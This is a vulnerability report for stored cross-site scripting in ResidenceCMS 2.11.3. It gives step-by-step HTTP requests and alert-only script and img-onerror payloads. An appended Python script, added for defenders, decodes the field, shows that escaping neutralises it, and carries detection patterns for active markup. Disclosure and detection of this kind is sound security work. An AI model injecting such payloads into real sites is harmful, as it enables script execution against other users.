Description
At the time of testing, there was a stored XSS vulnerability in ResidenceCMS version 2.11.3. I am raising this as a separate issue to the previous stored XSS vulnerability, as that one was dependent on the WYSIWYG content editor being enabled, whereas this particular issue can be performed by anyone with a user account and permission to edit properties.
Note that this was tested using the Docker setup of ResidenceCMS, and testing was done on 07/10/2025.
Steps to recreate:
- Log in as any user account that has a verified email address on the site. For the purposes of testing, the user account I used was manually verified from the administrator panel.
- Create a new property by clicking the plus icon in the bottom right of the page. An example request is included below (because of CSRF protections the requests will not replay as-is; the payloads are included near the bottom).
Create property request
POST /en/user/property/new HTTP/2
Host: localhost
Cookie: sidebar-toggled=false; PHPSESSID=hnt3k1j7oemmnmupd58oqan42k; REMEMBERME=App.Entity.User%3AeHNzdGVzdA~~%3A1762419274%3AURCTQDLza_h-WcQfXK9ysV1SpNPM1Y8ebWiI0DeEBoc~7EAd0C39Tt0vNDpiydvMMwqQOBnGzcmoqZSmzJWrRBE~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 750
Origin: https://localhost
Referer: https://localhost/en/user/property/new
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
property%5Bcity%5D=1&property%5Bdistrict%5D=&property%5Bneighborhood%5D=&property%5Bmetro_station%5D=&property%5BdealType%5D=1&property%5Bcategory%5D=1&property%5Bbathrooms_number%5D=&property%5Bbedrooms_number%5D=&property%5Bmax_guests%5D=&property%5Bproperty_description%5D%5Btitle%5D=XSSTESTPROPERTY&property%5Bproperty_description%5D%5Bmeta_title%5D=&property%5Bproperty_description%5D%5Bmeta_description%5D=&property%5Baddress%5D=55+Test+Street&property%5Blatitude%5D=&property%5Blongitude%5D=&property%5Bprice%5D=&property%5Bprice_type%5D=&property%5Bproperty_description%5D%5Bcontent%5D=TESTCONTENT&property%5B_token%5D=58af8c8592fa9b6cc2c0.E8SeAdGLHAVVP8PfADszfETxnkqni8dSp87lrX_4COA.YP2oZ6DkSUIhCJC7OQlHFDCi8HmVvIga_Yqy1CnVcZhK9-hA47xTPSB6jg
- Once the property has been created, it is possible to use the edit functionality to add JavaScript content into the content field. For the purposes of this report, I have provided two payloads: one using script tags and one using an img tag.
Edit property request
POST /en/user/property/20/edit HTTP/2
Host: localhost
Cookie: sidebar-toggled=false; PHPSESSID=hnt3k1j7oemmnmupd58oqan42k; REMEMBERME=App.Entity.User%3AeHNzdGVzdA~~%3A1762419274%3AURCTQDLza_h-WcQfXK9ysV1SpNPM1Y8ebWiI0DeEBoc~7EAd0C39Tt0vNDpiydvMMwqQOBnGzcmoqZSmzJWrRBE~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 805
Origin: https://localhost
Referer: https://localhost/en/user/property/20/edit
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
property%5Bcity%5D=1&property%5Bdistrict%5D=&property%5Bneighborhood%5D=&property%5Bmetro_station%5D=&property%5BdealType%5D=1&property%5Bcategory%5D=1&property%5Bbathrooms_number%5D=&property%5Bbedrooms_number%5D=&property%5Bmax_guests%5D=&property%5Bproperty_description%5D%5Btitle%5D=XSSTESTPROPERTY&property%5Bproperty_description%5D%5Bmeta_title%5D=&property%5Bproperty_description%5D%5Bmeta_description%5D=&property%5Baddress%5D=55+Test+Street&property%5Blatitude%5D=&property%5Blongitude%5D=&property%5Bprice%5D=&property%5Bprice_type%5D=&property%5Bproperty_description%5D%5Bcontent%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E&property%5B_token%5D=e.oHfzgZ3RAHaSFOSD3QR_UgNfbL_HfZ4feKdCTSQt9HA.007F5-y-VTHmI7fn5DYLOncMAoz1StFXIuMVNHIAjQj5RIXAr-ZPTudRqQ
URL Encoded payload:
%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E
Non URL Encoded:
<script>alert(1)</script>
<img src=x onerror=alert(2)>

Accessing the property page after editing triggers the XSS payloads.
[Screenshot: Payload 2 triggering]
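As an added defender-side illustration, not code from ResidenceCMS and not part of the original report, the following Python script decodes the content field from the edit-request body above, contrasts the vulnerable render path (stored content dropped into the page verbatim) with an HTML-escaped one, and runs a simple active-markup check over both. The field name matches the request shown above; the render functions, the trimmed sample body and the pattern list are assumptions constructed for this example and do not represent the project's own templates.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample: a trimmed copy of the edit-request body from the report,
# keeping only the title and the content field that carries the payload.
SAMPLE_BODY = (
    "property%5Bproperty_description%5D%5Btitle%5D=XSSTESTPROPERTY"
    "&property%5Bproperty_description%5D%5Bcontent%5D="
    "%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A"
    "%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E"
)

# Field name exactly as it appears (URL-decoded) in the request body.
CONTENT_FIELD = "property[property_description][content]"

# Markup that a browser would execute if it reached the page unescaped.
# Constructed for this example as a detection aid; it is not a full HTML sanitiser.
ACTIVE_MARKUP = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    # an on* attribute inside an opened tag, e.g. <img src=x onerror=...>
    "event_handler_attr": re.compile(r"<[a-z][^>]*\bon[a-z]+\s*=", re.IGNORECASE),
    # href/src pointing at a javascript: URL inside an opened tag
    "javascript_url": re.compile(
        r"<[a-z][^>]*\b(?:href|src)\s*=\s*['\"]?\s*javascript:", re.IGNORECASE
    ),
}


def stored_content(form_body: str) -> str:
    """Decode the form body as the server would and return the content field."""
    fields = parse_qs(form_body, keep_blank_values=True)
    return fields.get(CONTENT_FIELD, [""])[0]


def render_unescaped(content: str) -> str:
    """Vulnerable render path (assumed): stored content is placed in the page verbatim."""
    return f'<div class="property-content">{content}</div>'


def render_escaped(content: str) -> str:
    """Hardened render path: HTML-escape the stored content so tags become inert text."""
    return f'<div class="property-content">{html.escape(content, quote=True)}</div>'


def find_active_markup(fragment: str) -> list:
    """Return the names of the ACTIVE_MARKUP patterns found in an HTML fragment."""
    return [name for name, pattern in ACTIVE_MARKUP.items() if pattern.search(fragment)]


def audit_request_body(form_body: str) -> dict:
    """Summarise what the stored value would do under each render path."""
    content = stored_content(form_body)
    return {
        "stored_value": content,
        "flags_in_stored_value": find_active_markup(content),
        "flags_when_unescaped": find_active_markup(render_unescaped(content)),
        "flags_when_escaped": find_active_markup(render_escaped(content)),
    }


if __name__ == "__main__":
    report = audit_request_body(SAMPLE_BODY)
    for key, value in report.items():
        print(f"{key}: {value!r}")
```

The same check that flags the stored value is silent on the escaped render, which is the property a fix needs: contextual output encoding at render time (or a server-side allow-list sanitiser if the field must keep rich text) rather than trusting the stored value. The pattern list is useful for auditing existing rows in the property table for content that was saved before a fix.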
